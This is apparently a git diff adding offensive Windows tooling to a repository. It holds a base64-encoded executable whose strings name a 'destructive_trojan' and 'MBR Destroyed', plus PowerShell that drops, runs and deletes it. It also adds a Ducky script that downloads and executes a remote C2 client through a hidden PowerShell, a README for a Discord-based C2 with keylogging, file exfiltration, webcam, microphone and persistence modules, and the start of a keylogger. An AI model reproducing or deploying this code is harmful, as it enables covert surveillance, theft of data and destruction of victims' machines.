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BCQEBQMDAPoAAQBAAQUAWwACAEABBwA1AAMAAAEJAGgHAwAAAQsAUwcDAEABDQDeBwMAAAEPAE4FAwAAAREALgIDAAABEwBtCAIAAAEVAGEAAgAAARcAEwcCAAABGQBIAAQAAAEbALgDAwAAAR0A5AEDAAABHwDMBwMAAAEhAMUHAwAAASMA1wcDAAABJQBSAAMAAAEnADgCBQAAASkAUQIFAEABKwDTBgYAQAEtAA8CBwAEgAAAAAAAAAAAAAAAAAAAAABXCAAABAAAAAAAAAAAAAAA4QBUAQAAAAAEAAAAAAAAAAAAAADqAKkDAAAAAAQAAAAAAAAAAAAAAOEAaQYAAAAAAwACAAQAAgAFAAIAAAAAQ2xhc3MxAGtlcm5lbDMyAEdESV9wYXlsb2FkczIAPE1vZHVsZT4AQUNfU1JDX0FMUEhBAENyZWF0ZUNvbXBhdGlibGVEQwBSZWxlYXNlREMARGVsZXRlREMAR2V0REMAR2V0V2luZG93REMAU1JDQU5EAE5PVFNSQ0VSQVNFAEJMRU5ERlVOQ1RJT04AQUNfU1JDX09WRVIAV0hJVEVORVNTAEJMQUNLTkVTUwBDQVBUVVJFQkxUAFNSQ1BBSU5UAE1FUkdFUEFJTlQAUEFUUEFJTlQAUE9JTlQAU1JDSU5WRVJUAFBBVElOVkVSVABEU1RJTlZFUlQARXh0cmFjdEljb25FeFcAZ2V0X1gATk9UU1JDQ09QWQBNRVJHRUNPUFkAUEFUQ09QWQBnZXRfWQB2YWx1ZV9fAFNvdXJjZUNvbnN0YW50QWxwaGEAYWxwaGEAbXNjb3JsaWIARnJvbUhkYwBoZGMAblhTcmMAbllTcmMAaGRjU3JjAG5XaWR0aFNyYwBuWE9yaWdpblNyYwBuWU9yaWdpblNyYwBuSGVpZ2h0U3JjAEdlbmVyaWNSZWFkAEZpbGVTaGFyZVJlYWQAVGhyZWFkAGdldF9SZWQAbHBPdmVybGFwcGVkAGhXbmQAR2RpQWxwaGFCbGVuZABod25kAGR3U2hhcmVNb2RlAElEaXNwb3NhYmxlAENsb3NlSGFuZGxlAGhIYW5kbGUARnJvbUhhbmRsZQBSZWN0YW5nbGUAQ3JlYXRlRmlsZQBoVGVtcGxhdGVGaWxlAFdyaXRlRmlsZQBoRmlsZQBzRmlsZQBmaWxlAGxwRmlsZU5hbWUAVmFsdWVUeXBlAGJFcmFzZQBGaWxlRmxhZ0RlbGV0ZU9uQ2xvc2UARGlzcG9zZQBHZW5lcmljV3JpdGUARmlsZVNoYXJlV3JpdGUAbk51bWJlck9mQnl0ZXNUb1dyaXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAR2VuZXJpY0V4ZWN1dGUAZ2RpdGVzdC5leGUATWJyU2l6ZQBTeXN0ZW0uVGhyZWFkaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARHJhd1N0cmluZwBPcGVuRXhpc3RpbmcAU3lzdGVtLkRyYXdpbmcAQ3JlYXRlU29saWRCcnVzaABnZXRfV2lkdGgAbldpZHRoAHByb2Nlc3NJbmZvcm1hdGlvbkxlbmd0aABoZ2Rpb2JqAGhibU1hc2sAeE1hc2sAeU1hc2sAR2VuZXJpY0FsbABnZGkzMi5kbGwAa2VybmVsMzIuZGxsAFNoZWxsMzIuZGxsAFVzZXIzMi5kbGwAdXNlcjMyLmRsbABudGRsbC5kbGwAU3lzdGVtAFJhbmRvbQBnZXRfQm90dG9tAGJvdHRvbQBFbnVtAGRlc3RydWN0aXZlX3Ryb2phbgBnZXRfUHJpbWFyeVNjcmVlbgBscE51bWJlck9mQnl0ZXNXcml0dGVuAE1haW4AbGFyZ2VJY29uAERyYXdJY29uAHBpTGFyZ2VWZXJzaW9uAHBpU21hbGxWZXJzaW9uAHByb2Nlc3NJbmZvcm1hdGlvbgBibGVuZEZ1bmN0aW9uAGdldF9Qb3NpdGlvbgBkd0NyZWF0aW9uRGlzcG9zaXRpb24Ac29tZV9pY28AWmVybwBCbGVuZE9wAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAAU2xlZXAAZHdSb3AAZ2V0X1RvcAB0b3AAbnVtYmVyAGxwQnVmZmVyAGNyQ29sb3IAQ3Vyc29yAC5jdG9yAEludFB0cgBHcmFwaGljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAR0RJX3BheWxvYWRzAGdldF9Cb3VuZHMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBkd0ZsYWdzQW5kQXR0cmlidXRlcwBscFNlY3VyaXR5QXR0cmlidXRlcwBCbGVuZEZsYWdzAHNldF9Gb3JtYXRGbGFncwBTdHJpbmdGb3JtYXRGbGFncwBmbGFncwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBhbW91bnRJY29ucwBUZXJuYXJ5UmFzdGVyT3BlcmF0aW9ucwBwcm9jZXNzSW5mb3JtYXRpb25DbGFzcwBkd0Rlc2lyZWRBY2Nlc3MAaFByb2Nlc3MATnRTZXRJbmZvcm1hdGlvblByb2Nlc3MAQWxwaGFGb3JtYXQAU3RyaW5nRm9ybWF0AGZvcm1hdABFeHRyYWN0AEludmFsaWRhdGVSZWN0AG5Cb3R0b21SZWN0AGxwUmVjdABuVG9wUmVjdABuTGVmdFJlY3QAblJpZ2h0UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAblhMZWZ0AG5ZTGVmdABnZXRfTGVmdABsZWZ0AGdldF9SaWdodABnZXRfSGVpZ2h0AG5IZWlnaHQAcmlnaHQAb3BfSW1wbGljaXQARXhpdABQbGdCbHQAU3RyZXRjaEJsdABQYXRCbHQAQml0Qmx0AEVudmlyb25tZW50AGxwUG9pbnQARm9udABjb3VudABUaHJlYWRTdGFydABuWERlc3QAbllEZXN0AGhkY0Rlc3QAbldpZHRoRGVzdABuWE9yaWdpbkRlc3QAbllPcmlnaW5EZXN0AG5IZWlnaHREZXN0AGdkaXRlc3QATmV4dABnZGlfdGV4dABHZXREZXNrdG9wV2luZG93AEV4dHJhY3RJY29uRXgAaUluZGV4AHkAAAAAAAtFAFIAUgBPAFIAACdTAHkAcwB0AGUAbQAgAGkAcwAgAEMAbwByAHIAdQBwAHQAZQBkAAAbTQBCAFIAIABEAGUAcwB0AHIAbwB5AGUAZAAAB0wAVQBMAAAbUwB5AHMAdABlAG0AIABIAHUAbgBnAC4ALgAAC0EAcgBpAGEAbAAAF3MAaABlAGwAbAAzADIALgBkAGwAbAAAAAAACMkkUETXtECSiYFbRP8JpQAEIAEBCAMgAAEFIAEBEREEIAEBDgYHAxgYEiEFAAESIRgGBwISCBIlBAABAQgFIAIBHBgF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'
+$decodedFile = [System.Convert]::FromBase64String($b64)
+$File7 = "$env:temp/GDI7"+".exe"
+Set-Content -Path $File7 -Value $decodedFile -Encoding Byte
+& $File7
+SoundSpam
+sleep 10
+Remove-Item -Path $File2 -Force
+Remove-Item -Path $File7 -Force
+Remove-Item -Path $File6 -Force
diff --git a/Discord-C2/Discord C2 Client.txt b/Discord-C2/Discord C2 Client.txt
new file mode 100644
index 0000000..a1cf0ed
--- /dev/null
+++ b/Discord-C2/Discord C2 Client.txt
@@ -0,0 +1,27 @@
+
+REM Title: beigeworm's Discord Command And Control.
+REM Author: @beigeworm
+REM Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform.
+REM Target: Windows 10 and 11
+
+REM SETUP
+REM Goto https://pastebin.com and make an account..
+REM Create an empty paste/file and copy the RAW url.
+REM Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt
+REM Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx
+
+REM for more info goto - https://github.com/beigeworm/PoshCord-C2
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H
+ENTER
+DELAY 5000
+STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshCord-C2/main/Discord-C2-Client.ps1 | iex
+ENTER
+
diff --git a/Discord-C2/README.md b/Discord-C2/README.md
new file mode 100644
index 0000000..fe2f0d3
--- /dev/null
+++ b/Discord-C2/README.md
@@ -0,0 +1,62 @@
+# PoshCord-C2
+
+MAIN SCRIPT HERE - https://github.com/beigeworm/PoshCord-C2
+
+**SYNOPSIS**
+
+Using a Discord webhook and a hosted text file to Act as a Command and Control Platform.
+
+**INFORMATION**
+
+This script will wait until it notices a change in the contents of a text file hosted online (eg. github/pastebin).
+Every 10 seconds it will check a file for a change in the file contents and interpret it as a custom command / module.
+
+*Using github to host your command file will take up to 5 minutes to run each module command - Use pastebin (account needed) OR your own server to host the txt file for instant response*
+
+**SETUP**
+1. Goto https://pastebin.com and make an account..
+2. Create an empty paste/file and copy the RAW url.
+3. Change YOUR_FILE_URL to the RAW url eg. https://pastebin.com/QeCLTdea -OR- http://your.server.ip.here/files/file.txt
+4. Change YOUR_WEBHOOK_URL to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx
+
+**USAGE**
+1. Setup the script
+2. Run the script on a target.
+3. Check discord for 'waiting to connect..' message.
+4. Edit the contents of your hosted file to contain 'options' to get a list of modules
+5. Do the same with any other command listed - To run that module.
+
+**MODULES**
+1. `Message` : Send a message window to the Users desktop.
+2. `SpeechToText` : Send microphone audio transcript to Discord
+3. `Screenshot` : Sends a screenshot of the desktop to Discord.
+4. `KeyCapture` : Capture Keystrokes and send to Discord. (see ExtraInfo for usage.)
+5. `Exfiltrate` : Send various files to Discord zipped in 25mb files. (see ExtraInfo for usage.)
+6. `Upload` : Upload a file to Discord. (see ExtraInfo for usage.)
+7. `Systeminfo` : Send System information as text file to Discord. (takes a few minutes to gather data)
+8. `RecordAudio` : Record microphone to Discord (RecordAudio -t 100) in seconds
+9. `RecordScreen` : Record Screen to Discord (RecordScreen -t 100) in seconds
+10. `TakePicture` : Send a webcam picture to Discord. (can take a few minutes..)
+11. `FolderTree` : Save folder trees to file and send to Discord.
+12. `FakeUpdate` : Spoof windows update screen.
+13. `Nearby-Wifi` : Show nearby wifi networks
+14. `Send-Hydra` : Never ending popups (use killswitch)
+15. `AddPersistance` : Add this script to the startup folder.
+16. `RemovePersistance` : Remove this script from the startup folder.
+17. `IsAdmin` : Check if the session is admin.
+18. `AttemptElevate` : Attempt to restart script as admin. (displays a UAC prompt to User)
+19. `EnumerateLAN` : Show all devices on the network (see ExtraInfo for usage.) (can take a few miniutes to complete)
+20. `Close` : Close this Session
+21. `Options` : Show the Module menu
+22. `ExtraInfo` : Show extra Module information
+
+
+**FEATURES**
+
+**Custom Scripting**
+
+Edit the hosted file contents to any custom powershell script or command to run custom powershell.
+
+**Killswitch**
+
+Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands.
\ No newline at end of file
diff --git a/Discord-Infostealer/README.md b/Discord-Infostealer/README.md
new file mode 100644
index 0000000..1f26d7a
--- /dev/null
+++ b/Discord-Infostealer/README.md
@@ -0,0 +1,11 @@
+
+
+
+
+SYNOPSIS
+
+This script gathers Keypress information and posts to a discord webhook address with the results only
+when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that.
+
+USAGE
+
+1. Input your credentials below
+2. Run Script on target System
+3. Check Discord for results
diff --git a/Discord-Keylogger/main.ps1 b/Discord-Keylogger/main.ps1
new file mode 100644
index 0000000..4d701d9
--- /dev/null
+++ b/Discord-Keylogger/main.ps1
@@ -0,0 +1,71 @@
+# Import DLL Definitions for keyboard inputs
+$API = @'
+[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
+public static extern short GetAsyncKeyState(int virtualKeyCode);
+[DllImport("user32.dll", CharSet=CharSet.Auto)]
+public static extern int GetKeyboardState(byte[] keystate);
+[DllImport("user32.dll", CharSet=CharSet.Auto)]
+public static extern int MapVirtualKey(uint uCode, int uMapType);
+[DllImport("user32.dll", CharSet=CharSet.Auto)]
+public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+'@
+$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru
+
+# Add stopwatch for intellegent sending
+$LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew()
+$KeypressThreshold = [TimeSpan]::FromSeconds(10)
+
+# Start a continuous loop
+While ($true){
+ $keyPressed = $false
+ try{
+ # Start a loop that checks the time since last activity before message is sent
+ while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) {
+ # Start the loop with 30 ms delay between keystate check
+ Start-Sleep -Milliseconds 30
+ for ($asc = 8; $asc -le 254; $asc++){
+ # Get the key state. (is any key currently pressed)
